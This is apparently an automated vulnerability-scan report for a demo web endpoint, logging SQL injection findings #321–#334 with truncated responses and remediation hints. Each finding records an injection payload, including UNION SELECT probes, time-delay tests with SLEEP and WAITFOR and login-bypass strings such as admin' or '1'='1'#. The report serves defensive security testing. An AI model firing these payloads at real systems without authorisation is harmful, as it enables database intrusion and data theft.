https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #321\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #322\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #323\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #324\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io test UNION select 1, @@version, 1, 1;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #325\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #326\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #327\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #328Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #329\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io waitfor delay '00:00:05'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #330\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\"or 1=1 or \"\"=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #331\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #332\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #333\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin' or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #334\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. 